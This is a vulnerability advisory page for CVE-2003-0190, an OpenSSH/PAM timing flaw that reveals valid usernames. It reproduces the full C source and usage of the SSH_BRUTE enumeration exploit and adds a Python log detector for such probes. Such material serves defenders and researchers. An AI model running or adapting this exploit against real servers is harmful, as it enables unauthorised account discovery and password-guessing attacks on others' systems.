OpenSSH PAM-Enabled Authentication Timing Information Disclosure Vulnerability

Vulnerability ID: 1107299    Vulnerability type: Design error
Published: 2003-04-30    Updated: 2007-05-08
CVE ID: CVE-2003-0190    CNNVD ID: CNNVD-200305-021
Platform: Linux    CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/25
https://www.securityfocus.com/bid/11781
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-021
|Details
OpenSSH is an open-source implementation of the SSH protocol that has been ported to many operating systems. Portable OpenSSH builds with PAM support are subject to a timing attack: a remote attacker can use it to determine whether a user account exists, which is an information disclosure. Testing shows that when OpenSSH is configured with --with-pam, the server takes a different amount of time to respond to a valid user than to an invalid one, so an attacker can tell whether a given system user exists. Once a username has been confirmed this way, the attacker can go on to guess its password.
|Exploit
/*
 * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 * Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
 *
 * Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
 * Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
 *
 * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
 *
 * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
 *
 * $ tar xvfz openssh-3.6.1p1.tar.gz
 * $ patch -p0 <openssh-3.6.1p1_brute.diff
 * patching file openssh-3.6.1p1/ssh.c
 * patching file openssh-3.6.1p1/sshconnect.c
 * patching file openssh-3.6.1p1/sshconnect1.c
 * patching file openssh-3.6.1p1/sshconnect2.c
 * $ cd openssh-3.6.1p1
 * $ ./configure
 * $ make
 * $ cc ../ssh_brute.c -o ssh_brute
 * $ ./ssh_brute 1 list.txt 192.168.0.66
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen() */
#include <sys/wait.h>   /* WEXITSTATUS() */

/* an illegal user */
#define NO_USER "not_val_user"

/* path of the patched ssh (its exit status is the server's response time in seconds) */
#define PATH_SSH "./ssh"

/* max time range for invalid user */
#define TIME_RANGE 3

int main(int argc, char *argv[])
{
    FILE *in;
    char buffer[2000], username[100], *host;
    int time_non_valid = 0, time_user = 0;
    int version = 1, i = 0, ret;

    fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
    fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n");

    /* protocol version, user file and host are all required (argv[3] is read below) */
    if (argc < 4) {
        fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
        exit(-1);
    }

    version = atoi(argv[1]);
    host = argv[3];

    if ((in = fopen(argv[2], "r")) == NULL) {
        fprintf(stderr, "\n Can't open %s\n", argv[2]);
        exit(-1);
    }

    /* test an illegal user: the average of three runs is the baseline */
    printf("\n Testing an illegal user\t: ");
    fflush(stdout);

    snprintf(buffer, sizeof(buffer), "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);

    for (i = 0; i < 3; i++) {
        ret = system(buffer);
        time_non_valid += WEXITSTATUS(ret);
    }

    time_non_valid /= 3;

    printf("%d second(s)\n\n", time_non_valid);

    /* anything slower than baseline + TIME_RANGE is treated as a valid user */
    time_non_valid += TIME_RANGE;

    /* test supplied users, one name per line (%99s keeps the read inside username[]) */
    while (fscanf(in, "%99s", username) == 1) {

        printf(" Testing login %s\t", username);

        if (strlen(username) <= 8)
            printf("\t");
        printf(": ");

        fflush(stdout);

        snprintf(buffer, sizeof(buffer), "%s -%d %s@%s", PATH_SSH, version, username, host);
        ret = system(buffer);
        time_user = WEXITSTATUS(ret);

        /* \033 is ESC; the original used the GNU-only \E escape */
        if (time_user <= time_non_valid)
            printf("\033[31m\033[1mILLEGAL\033[m\t[%d second(s)]\n", time_user);
        else {
            /* valid user? test it again to be sure */

            ret = system(buffer);
            time_user = WEXITSTATUS(ret);

            if (time_user <= time_non_valid)
                printf("\033[31m\033[1mILLEGAL\033[m\t[%d second(s)] [2 test]\n", time_user);
            else
                printf("\033[32m\033[1mUSER OK\033[m\t[%d second(s)]\n", time_user);
        }
    }

    fclose(in);

    printf("\n");

    exit(0);
}

// milw0rm.com [2003-04-30]
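
From the defender's side, the probe described above leaves a recognisable trace in sshd authentication logs: one source failing against many distinct usernames in a short window, usually with a known-bad name repeated first to establish the baseline. The following detector is an added example, not part of the original advisory or of the Mediaservice.net tool; its log lines, hostnames and addresses are constructed, and it assumes the syslog format of current OpenSSH "Invalid user ..." and "Failed password for ..." messages.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd syslog lines (assumed format, not from the page): 192.168.0.5 probes
# a known-bad name for a baseline, then each listed name once; 10.0.0.9 is a normal user.
SAMPLE_LOG = """\
Apr 30 10:00:01 host sshd[1201]: Invalid user not_val_user from 192.168.0.5 port 40001
Apr 30 10:00:04 host sshd[1203]: Failed password for invalid user not_val_user from 192.168.0.5 port 40002 ssh2
Apr 30 10:00:08 host sshd[1205]: Failed password for alice from 192.168.0.5 port 40003 ssh2
Apr 30 10:00:12 host sshd[1207]: Invalid user bob from 192.168.0.5 port 40004
Apr 30 10:00:15 host sshd[1208]: Invalid user charlie from 192.168.0.5 port 40005
Apr 30 10:05:00 host sshd[1300]: Failed password for carol from 10.0.0.9 port 51000 ssh2
Apr 30 10:05:30 host sshd[1301]: Failed password for carol from 10.0.0.9 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Invalid user|Failed password for(?: invalid user)?) (?P<user>\S+) from (?P<ip>\S+)")

def parse_events(text):
    """Return (timestamp, source ip, username, name_does_not_exist) per failed attempt."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue  # successful logins and unrelated lines are not auth failures
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less syslog stamp
        events.append((ts, m.group("ip"), m.group("user"), "invalid user" in line.lower()))
    return events

def find_enumeration(text, window_s=60, min_users=3):
    """Flag sources that fail against >= min_users distinct names within window_s seconds."""
    by_ip = defaultdict(list)
    for ev in parse_events(text):
        by_ip[ev[1]].append(ev)
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        start = 0
        for end in range(len(evs)):  # sliding window over this source's failures
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            window = evs[start:end + 1]
            users = {e[2] for e in window}
            if len(users) >= min_users and len(users) > hits.get(ip, {}).get("distinct_users", 0):
                hits[ip] = {"distinct_users": len(users),
                            "invalid_users": len({e[2] for e in window if e[3]})}
    return hits
```

A high share of nonexistent names among a source's attempts separates enumeration from an ordinary user mistyping a password; tune window_s and min_users to the host's normal login rate.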
|Affected products
SuSE Linux Enterprise Server 9
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
OpenSSH OpenSSH
|References

Source: BID
Name: 7467
Link: http://www.securityfocus.com/bid/7467
Source: BUGTRAQ
Name: 20030430 OpenSSH/PAM timing attack allows remote users identification
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105172058404810&w=2
Source: TURBO
Name: TLSA-2003-31
Link: http://www.turbolinux.com/security/TLSA-2003-31.txt
Source: REDHAT
Name: RHSA-2003:224
Link: http://www.redhat.com/support/errata/RHSA-2003-224.html
Source: REDHAT
Name: RHSA-2003:222
Link: http://www.redhat.com/support/errata/RHSA-2003-222.html
Source: BUGTRAQ
Name: 20030806 [OpenPKG-SA-2003.035] OpenPKG Security Advisory (openssh)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=106018677302607&w=2
Source: FULLDISC
Name: 20030430 OpenSSH/PAM timing attack allows remote users identification
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2003-April/004815.html
Source: lab.mediaservice.net
Link: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
Source: US Government Resource: ova